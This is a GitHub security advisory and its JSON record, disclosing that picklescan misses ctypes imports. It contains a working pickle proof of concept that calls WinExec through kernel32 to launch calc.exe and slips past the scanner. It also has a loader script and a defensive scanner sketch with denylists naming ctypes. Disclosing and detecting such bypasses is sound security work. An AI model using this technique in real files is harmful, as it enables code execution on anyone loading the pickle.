GHSA-4675-36F9-WF6R

Vulnerability from github – Published: 2025-12-29 15:23 – Updated: 2025-12-29 15:23
Summary
Picklescan does not block ctypes
Details

Summary

Picklescan doesn't flag the ctypes module as dangerous, which is a huge issue. ctypes is basically a foreign function interface library and can be used to:

* Load DLLs
* Call C functions directly
* Manipulate memory through raw pointers

This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue with allowing ctypes is that it can be used down the line to dismantle interpreter-based Python sandboxes, as ctypes allows direct access to raw memory.

This is a more severe loophole than normal gadget chains and bypasses, as raw memory access can be used for a lot of nefarious purposes down the line if left undetected.

PoC

```python
import pickle
import ctypes
import operator

class Kernel32Loader:
    def __reduce__(self):
        #we go direct to the kerneeellllllll
        return (ctypes.WinDLL, ("kernel32.dll",))

class WinExecGetter:
    def __reduce__(self):
        return (operator.itemgetter("WinExec"), (Kernel32Loader(),))

class PopCalc:
    def __reduce__(self):
        #methodcaller to invoke "__call__" on the function pointer.
        return (
            operator.methodcaller("__call__", b"calc.exe", 1),
            (WinExecGetter(),)
        )

try:
    payload = pickle.dumps(PopCalc())

    with open("calc_exploit.pkl", "wb") as f:
        f.write(payload)

    print("Generated 'calc_exploit.pkl'")

except Exception as e:
    print(f"Generation failed: {e}")
```

This will create a pickle file which is not detected as malicious by the latest version of picklescan.

```python
import pickle

print("Loading calc_exploit.pkl...")
with open("calc_exploit.pkl", "rb") as f:
    pickle.load(f)
```
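
A minimal static check for the gap this advisory describes, added here as an illustration and not taken from picklescan: it lists the imports a pickle would perform without loading it, then shows that a denylist lacking ctypes reports nothing while one that includes it, or an allowlist, flags the file. The denylists, the allowlist, the function names and the two sample byte strings are assumptions constructed for this example; the samples encode a harmless `ctypes.sizeof(ctypes.c_int)` call and are only scanned.

```python
import pickletools

# Policies assumed for this example; they are not picklescan's actual lists.
DENYLIST_WITHOUT_CTYPES = {"os", "subprocess", "builtins"}
DENYLIST_WITH_CTYPES = DENYLIST_WITHOUT_CTYPES | {"ctypes", "_ctypes"}
ALLOWLIST = {"collections"}

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

# Constructed, harmless samples (ctypes.sizeof(ctypes.c_int)); scanned, never loaded.
SAMPLE_PROTO2 = b"\x80\x02cctypes\nsizeof\ncctypes\nc_int\n\x85R."
SAMPLE_PROTO4 = (b"\x80\x04\x8c\x06ctypes\x8c\x06sizeof\x93"
                 b"\x8c\x06ctypes\x8c\x05c_int\x93\x85R.")


def imported_globals(data: bytes):
    """List (module, name) pairs a pickle would import, without unpickling it."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))  # arg is "module name"
        elif op.name == "STACK_GLOBAL":
            # Heuristic: operands are the two most recent string pushes.
            # If they cannot be recovered, report an unknown import (fail closed).
            pair = tuple(strings[-2:]) if len(strings) >= 2 else ("?", "?")
            found.append(pair)
    return found


def denylist_hits(data: bytes, denylist):
    """Imports whose top-level module is on the denylist."""
    return [g for g in imported_globals(data) if g[0].split(".")[0] in denylist]


def allowlist_violations(data: bytes, allowlist=ALLOWLIST):
    """Imports whose top-level module is NOT explicitly allowed."""
    return [g for g in imported_globals(data) if g[0].split(".")[0] not in allowlist]


if __name__ == "__main__":
    for label, sample in (("proto2", SAMPLE_PROTO2), ("proto4", SAMPLE_PROTO4)):
        print(label, "without ctypes:", denylist_hits(sample, DENYLIST_WITHOUT_CTYPES))
        print(label, "with ctypes:   ", denylist_hits(sample, DENYLIST_WITH_CTYPES))
        print(label, "allowlist:     ", allowlist_violations(sample))
```

The `STACK_GLOBAL` handling is a heuristic: strings fetched back from the memo with `BINGET` are not tracked, so a production scanner needs fuller stack emulation.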


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.33"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-29T15:23:49Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nPicklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to\n* Load DLLs\n* Call C functions directly\n* Manipulate memory raw pointers.\n\nThis can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.\n\nThis is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected\n\n### PoC\n```python\nimport pickle\nimport ctypes\nimport operator\n\nclass Kernel32Loader:\n    def __reduce__(self):\n        #we go direct to the kerneeellllllll\n        return (ctypes.WinDLL, (\"kernel32.dll\",))\n\nclass WinExecGetter:\n    def __reduce__(self):\n        return (operator.itemgetter(\"WinExec\"), (Kernel32Loader(),))\n\nclass PopCalc:\n    def __reduce__(self):\n        #methodcaller to invoke \"__call__\" on the function pointer.\n        return (\n            operator.methodcaller(\"__call__\", b\"calc.exe\", 1), \n            (WinExecGetter(),)\n        )\n\ntry:\n    payload = pickle.dumps(PopCalc())\n    \n    with open(\"calc_exploit.pkl\", \"wb\") as f:\n        f.write(payload)\n        \n    print(\"Generated \u0027calc_exploit.pkl\u0027\")\n\nexcept Exception as e:\n    print(f\"Generation failed: {e}\")\n```\nThis will create a pickle file which is not detected by the latest version of picklescan as malicious\n\n```python\nimport pickle\nprint(\"Loading bypass.pkl...\")\npickle.load(open(\"calc_exploit.pkl\", \"rb\"))\n```\n\n\u003cimg width=\"1333\" height=\"677\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f5b066f3-116a-4377-a538-f293f3a6c176\" /\u003e",
  "id": "GHSA-4675-36f9-wf6r",
  "modified": "2025-12-29T15:23:49Z",
  "published": "2025-12-29T15:23:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4675-36f9-wf6r"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/pull/53"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Picklescan does not block ctypes"
}

